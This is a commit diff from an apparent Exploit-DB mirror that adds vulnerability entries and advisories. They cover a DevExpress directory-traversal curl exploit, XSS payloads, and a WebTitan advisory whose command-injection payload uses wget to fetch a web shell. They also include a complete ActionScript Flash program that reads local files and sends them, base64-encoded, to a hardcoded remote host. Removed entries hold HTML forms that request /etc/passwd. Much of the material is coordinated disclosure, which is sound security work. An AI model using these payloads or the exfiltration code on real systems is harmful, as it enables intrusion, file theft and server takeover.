bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_11_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-11 04:38:08 +00:00
parent f8588487ce
commit 9317b28542
10 changed files with 540 additions and 59 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -9834,7 +9834,7 @@ id,file,description,date,author,platform,type,port
10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0
10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0
10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0
10610,platforms/linux/remote/10610.rb,"CoreHTTP Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0
10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 (CGI) - Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0
10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,indoushka,php,webapps,0
10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0
10613,platforms/linux/local/10613.c,"2.6.18-20 2009 Local Root Exploit",2009-12-23,DigitALL,linux,local,0
@ -30335,8 +30335,6 @@ id,file,description,date,author,platform,type,port
33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0
33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
33667,platforms/php/webapps/33667.txt,"Wordpress Theme Elegance - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33668,platforms/php/webapps/33668.txt,"Wordpress Theme Infocus - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
@ -30352,3 +30350,10 @@ id,file,description,date,author,platform,type,port
33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 '_SESSION[dede_admin_id]' Parameter Authentication Bypass Vulnerability",2010-03-01,"Wolves Security Team",php,webapps,0
33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 'readme.nsf' Cross Site Scripting Vulnerability",2010-03-02,"Nahuel Grisolia",multiple,remote,0
33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQMS Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0
33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 'uid' Parameter Cross Site Scripting Vulnerability",2010-03-02,"lis cker",php,webapps,0
33689,platforms/multiple/remote/33689.as,"Adobe Flash Player <= 10.1.51 Local File Access Information Disclosure Vulnerability",2010-03-03,"lis cker",multiple,remote,0
33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 Remote File Upload Vulnerability",2010-03-03,indoushka,php,webapps,0
33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation 'error_msg_parameter' Cross Site Scripting Vulnerability",2010-03-04,thebluegenius,jsp,webapps,0
33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80

Can't render this file because it is too large.

137
platforms/asp/webapps/33700.txt Executable file
View file

@ -0,0 +1,137 @@
Advisory: Directory Traversal in DevExpress ASP.NET File Manager
During a penetration test RedTeam Pentesting discovered a directory
traversal vulnerability in DevExpress' ASP.NET File Manager and File
Upload. Attackers are able to read arbitrary files by specifying a
relative path.
Details
=======
Product: DevExpress ASPxFileManager Control for WebForms and MVC
Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8
Fixed Versions: DevExpress ASPxFileManager v13.2.9
Vulnerability Type: Directory Traversal
Security Risk: high
Vendor URL:
https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006
Advisory Status: published
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575
Introduction
============
"The DevExpress ASP.NET Subscription includes a standalone Multi-File
Upload Manager for WebForms and MVC and a pre-built File Manager for
WebForms; built so you can instantly introduce file management
capabilities in your next web application."
(from DevExpress' Homepage)
More Details
============
The ASPX File Manager component is prone to a directory traversal
vulnerability. Attackers with access to the File Manager component can
read arbitrary files on the same partition as the shared directory.
A common request to download a file via the File Manager component
requires multiple HTTP-Post parameters:
__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1
__EVENTARGUMENT=13%7C<file.ext>
__EVENTVALID=
The parameter __EVENTARGUMENT=13|<file.ext> specifies a file download
and the file which is to be downloaded. Attackers may also request files
outside of the shared directory by prepending a relative path to a
parent directory.
Proof of Concept
================
By requesting files with a relative path, files otherwise not available
will be accessible through the File Manager component. Depending on the
shared directory and the webserver configuration, the webserver
configuration file might for example be accessible through the File
Manager component:
__EVENTARGUMENT=13|../../web.config
Other sensitive operating system files could be affected, too.
Example exploit:
------------------------------------------------------------------------
curl --data __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\
"&__EVENTARGUMENT=13%7C../../web.config&=&__EVENTVALID" \
http://example.com/FileManagerComponent.aspx
------------------------------------------------------------------------
The request above will download the specified file.
Workaround
==========
Instead of a physical file system provider, a database file system
provider with limited access permissions could be used.
Fix
===
Update ASPxFileManager control to DevExpress libraries version v13.2.9.
Security Risk
=============
The risk is estimated to be high. This vulnerability allows attackers to
access arbitrary files on the same partition as the File Manager's root
directory. This may allow attackers to read sensitive information like
the webserver configuration.
Timeline
========
2014-03-10 Vulnerability identified
2014-03-21 Customer approved disclosure to vendor
2014-03-21 CVE number requested and assigned
2014-03-25 Vendor notified
2014-04-11 Customer opened support ticket with vendor
2014-04-17 Vendor released fixed version
2014-04-17 Vendor released security advisory to customers
2014-06-05 Advisory released
References
==========
Vendor Security Advisory:
http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

7
platforms/jsp/webapps/33691.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38534/info
Comptel Provisioning and Activation is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E

189
platforms/multiple/remote/33689.as Executable file
View file

@ -0,0 +1,189 @@
source: http://www.securityfocus.com/bid/38517/info
Adobe Flash Player is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
package com.lavakumar.imposter{
import com.dynamicflash.util.Base64;
import flash.display.MovieClip;
import flash.display.Stage;
import flash.text.TextField;
import flash.events.Event;
import flash.events.DataEvent;
import flash.events.IOErrorEvent;
import flash.events.ProgressEvent;
import flash.events.SecurityErrorEvent;
import flash.events.HTTPStatusEvent;
import flash.utils.ByteArray;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLLoaderDataFormat;
public class Main extends MovieClip {
var filecontent:String="";
var read:int=0;
var inputcount:int=0;
var filecounter:int=0;
var files:Array;
var statuscode:int=1;
public function Main() {
addEventListener(Event.ENTER_FRAME, check, false, 0, true);
}
public function check(e:Event):void {
if (statuscode==1) {
get();
} else if (statuscode==2) {
load();
} else if (statuscode==3) {
send();
}
}
public function get():void {
var getter:URLLoader = new URLLoader();
getter.dataFormat=URLLoaderDataFormat.BINARY;
getter.addEventListener(Event.COMPLETE, get_FileLoaded);
getter.addEventListener(IOErrorEvent.IO_ERROR, get_FileIoError);
getter.addEventListener(Event.OPEN, get_FileOpened);
getter.addEventListener(ProgressEvent.PROGRESS, get_FileProgress);
getter.addEventListener(SecurityErrorEvent.SECURITY_ERROR, get_FileSecurityError);
getter.addEventListener(HTTPStatusEvent.HTTP_STATUS, get_FileStatus);
getter.addEventListener(DataEvent.DATA, get_DataEventHandler);
var inputfile:URLRequest=new URLRequest("//192.168.1.3/imp/imposter"+inputcount.toString()+".input");
statuscode=0;
getter.load(inputfile);
}
public function load():void {
var loader:URLLoader = new URLLoader();
loader.dataFormat=URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE, load_FileLoaded);
loader.addEventListener(IOErrorEvent.IO_ERROR, load_FileIoError);
loader.addEventListener(Event.OPEN, load_FileOpened);
loader.addEventListener(ProgressEvent.PROGRESS, load_FileProgress);
loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, load_FileSecurityError);
loader.addEventListener(HTTPStatusEvent.HTTP_STATUS, load_FileStatus);
loader.addEventListener(DataEvent.DATA, load_DataEventHandler);
if (filecounter<files.length) {
var filename:String=files[filecounter];
filecounter++;
var file:URLRequest=new URLRequest(filename);
statuscode=0;
loader.load(file);
} else {
statuscode=1;
}
}
public function send():void {
if (read<filecontent.length) {
var temp:String;
var sendurl:String="";
if ((filecontent.length - read) < 200) {
temp=filecontent.substr(read);
var regex:RegExp=/\//g;
temp=temp.replace(regex,"-");
sendurl="//192.168.1.3/imp/is_"+filecounter+"_"+read+"_"+filecontent.length+"_"+temp;
read=filecontent.length;
} else {
temp=filecontent.substr(read,200);
var regex:RegExp=/\//g;
temp=temp.replace(regex,"-");
sendurl="//192.168.1.3/imp/is_"+filecounter+"_"+read+"_"+filecontent.length+"_"+temp;
read=read+200;
}
var senddata:URLRequest=new URLRequest(sendurl);
var sender:URLLoader = new URLLoader();
sender.dataFormat=URLLoaderDataFormat.BINARY;
sender.addEventListener(Event.COMPLETE, send_FileLoaded);
sender.addEventListener(IOErrorEvent.IO_ERROR, send_FileIoError);
sender.addEventListener(Event.OPEN, send_FileOpened);
sender.addEventListener(ProgressEvent.PROGRESS, send_FileProgress);
sender.addEventListener(SecurityErrorEvent.SECURITY_ERROR, send_FileSecurityError);
sender.addEventListener(HTTPStatusEvent.HTTP_STATUS, send_FileStatus);
sender.addEventListener(DataEvent.DATA, send_DataEventHandler);
sender.load(senddata);
} else {
read=0;
statuscode=2;
}
}
function load_FileLoaded(event:Event):void {
var loader:URLLoader=event.target as URLLoader;
var data:ByteArray=loader.data as ByteArray;
filecontent=Base64.encodeByteArray(data);
data=null;
statuscode=3;
}
function load_FileOpened(event:Event):void {
var loader:URLLoader=event.target as URLLoader;
}
function load_DataEventHandler(event:Event):void {
}
function load_FileProgress(event:flash.events.ProgressEvent):void {
}
function load_FileSecurityError(event:Event):void {
statuscode=2;
}
function load_FileIoError(event:Event):void {
statuscode=2;
}
function load_FileStatus(event:HTTPStatusEvent):void {
}
function load_FileNotFound(event:IOErrorEvent):void {
statuscode=2;
}
function get_FileLoaded(event:Event):void {
var getter:URLLoader=event.target as URLLoader;
var data:String=event.target.data;
if (data.length>0) {
files=data.split(',');
if (files.length>0) {
statuscode=2;
inputcount++;
} else {
statuscode=1;
}
} else {
statuscode=1;
}
}
function get_FileOpened(event:Event):void {
}
function get_DataEventHandler(event:Event):void {
}
function get_FileProgress(event:flash.events.ProgressEvent):void {
}
function get_FileSecurityError(event:Event):void {
statuscode=1;
}
function get_FileIoError(event:Event):void {
statuscode=1;
}
function get_FileStatus(event:HTTPStatusEvent):void {
}
function get_FileNotFound(event:IOErrorEvent):void {
statuscode=1;
}
function send_FileLoaded(event:Event):void {
}
function send_FileOpened(event:Event):void {
}
function send_DataEventHandler(event:Event):void {
}
function send_FileProgress(event:flash.events.ProgressEvent):void {
}
function send_FileSecurityError(event:Event):void {
}
function send_FileIoError(event:Event):void {
}
function send_FileStatus(event:HTTPStatusEvent):void {
}
function send_FileNotFound(event:IOErrorEvent):void {
}
}
}

24
platforms/php/webapps/33667.txt
View file

@ -1,24 +0,0 @@
[+] Post Local File Disclosure in wordpress theme Elegance
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/elegance/"
[+] Vendor Homepage: http://www.elegantthemes.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof

32
platforms/php/webapps/33668.txt
View file

@ -1,32 +0,0 @@
[+] Post Local File Disclosure in wordpress theme Infocus
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/infocus/"
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof

9
platforms/php/webapps/33688.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38484/info
Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Discuz! 6.0.0 is vulnerable; other versions may also be affected.
http://www.example.com:80/eccredit.php?action=list&uid="><script>alert(/Liscker/);</script>

10
platforms/php/webapps/33690.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38527/info
DosyaYukle Scripti is prone to a remote file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
DosyaYukle Scripti 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/dosyayukle/
http://www.example.com/dosyayukle/dosyalar/ch99.php

23
platforms/php/webapps/33697.txt Executable file
View file

@ -0,0 +1,23 @@
?# Exploit Title: Persistent Cross Site Scripting Vulnerability in eFront
3.6.14.4
# Date: 05 June 2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://www.efrontlearning.net
# Software Link:
https://sourceforge.net/projects/efrontlearning/files/latest/download
# Version: 3.6.14.4
# Tested on: Windows 7
#################################################
eFront 3.6.14.4 is vulnerable for a Persistent Cross Site Scripting
Vulnerability.
The vulnerability affects 'surname' parameter(Last Name Field) while
updating the account details.
Vendor has supplied a workaround for the vulnerability which can be found
at
https://github.com/epignosis/efront_open_source/issues/5
#################################################
Greetz : oldmanlab, Jinen Patel

157
platforms/php/webapps/33699.txt Executable file
View file

@ -0,0 +1,157 @@
SEC Consult Vulnerability Lab Security Advisory < 20140606-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: WebTitan
vulnerable version: 4.01 (Build 68)
fixed version: 4.04
impact: critical
homepage: http://www.webtitan.com
found: 2014-04-07
by: Robert Giruckas, Mindaugas Liudavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WebTitan offers ultimate protection from internet based threats and powerful
web filtering functionalities to SMBs, Service Providers and Education sectors
around the World."
Source: http://www.webtitan.com/about-us/webtitan
Business recommendation:
------------------------
Multiple critical security vulnerabilities have been identified in the WebTitan
system. Exploiting these vulnerabilities potential attackers could take control
over the entire system.
It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) SQL Injection
A SQL injection vulnerability in the /categories-x.php script allows
unauthenticated remote attackers to execute arbitrary SQL commands via the
"sortkey" parameter.
2) Remote command execution
Multiple remote command execution vulnerabilities were detected in the
WebTitan GUI. This security flaw exists due to lack of input validation. An
authenticated attacker of any role (Administrator, Policy Manager, Report
Manager) can execute arbitrary OS commands with the privileges of the web
server.
3) Path traversal
The web GUI fails to properly filter user input passed to the logfile
parameter. This leads to arbitrary file download by unauthenticated attackers.
4) Unprotected Access
The web GUI does not require authentication for certain PHP scripts. This
security issue allows an unauthenticated remote attacker to download Webtitan
configuration backup (including hashed user credentials) to the attacker's FTP
server.
Proof of concept:
-----------------
1) SQL Injection
The manipulation of the "sortkey" parameter allows users to modify the
original SQL query.
GET /categories-x.php HTTP/1.1
/categories-x.php?getcategories&sortkey=name) limit 1;--
/categories-x.php?getcategories&sortkey=name) limit 5;--
2) Remote command execution
Due to improper user input validation it is possible to inject arbitrary OS
commands using backticks ``. Some of the affected files do not sanitize any
type of shell metacharacters, this allows an attacker to use more flexible OS
commands. Tested and working payload for most scripts: `/usr/local/bin/wget
http://<URL to shell script> -O /usr/blocker/www/graph/CPU/xshell.php`
Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php,
scheduledreports-x.php, reporting-x.php, network-x.php
a. logs-x.php, vulnerable parameters: fname, logfile
/logs-x.php?jaction=view&fname=webtitan.log;ls -la
/logs-x.php POST Content: jaction=delete&logfile=<PAYLOAD>
b. users-x.php, vulnerable parameters: ldapserver
/users-x.php?findLdapDC=1&ldapserver=<PAYLOAD>
c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
/support-x.php POST Content: jaction=ping&pinghost=<PAYLOAD>
/support-x.php POST Content: jaction=ping&dighost=<PAYLOAD>
/support-x.php POST Content: jaction=ping&tracehost=<PAYLOAD>
d. time-x.php, vulnerable parameters: ntpserversList
/time-x.php POST Content:
jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList=<PAYLOAD>
e. scheduledreports-x.php, vulnerable parameters: reportid
/scheduledreports-x.php?runReport=1&reportid=<PAYLOAD>
f. reporting-x.php, vulnerable parameter: delegated_admin
/reporting-x.php POST Content:
jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10&currentpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';<PAYLOAD>'&gotopage=1
g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols
length), domain
jaction=saveHostname&hostname=`root`
jaction=saveDNS&domain=domain.com;<PAYLOAD>&dnsservers=192.168.0.1-:-
3) Path traversal
Due to missing input filtering in the logs-x.php script it is possible to
download arbitrary files without any authentication:
Vulnerable parameters: logfile
Post Content: jaction=download&logfile=../../../etc/passwd
4) Unprotected Access
a. Since the script backup-x.php does not require authentication, remote
attackers can initiate a backup of Webtitan configuration files to a remote
FTP server by executing the following requests:
/backup-x.php
POST Content:
jaction=saveFTP&jstatus=&schedule=1&frequency=daily&hour=16&minute=38&day_of_week=Mon&day_of_month=1&ftpserver=<IP>&ftplogin=<login>&ftppassword=<pw>&ftplocation=<path>
Where <IP> is the remote FTP server IP, <login> - remote FTP server
login, <password> - remote FTP, <path> - path where to store backup
With the next request, an attacker can force the backup to be uploaded
to the attacker's FTP server:
/backup-x.php
POST Content: jaction=exportNowtoFtp
b. The autoconf-x.php, contentfiltering-x.php, license-x.php, msgs.php,
reports-drill.php scripts can be reached by an unauthenticated user. The
categories-x.php, urls-x.php can also be accessed by faking the HTTP User-Agent
header, by setting it to "Shockwave Flash".
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the WebTitan VMware
appliance ver. 4.0.1 (build 68). It is assumed that previous versions are
affected too.
Vendor contact timeline:
------------------------
2014-04-17: Contacting vendor through info@webtitan.com and helpdesk@webtitan.com
2014-04-23: Vendor is investigating the vulnerabilities
2014-05-09: Vendor is testing security patches
2014-06-03: Vendor releases the version 4.04 of WebTitan
2014-06-06: SEC Consult releases a coordinated security advisory
Solution:
> -------- Update to the most recent version 4.04 of WebTitan. Workaround: ----------- Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF Mindaugas Liudavicius / @2014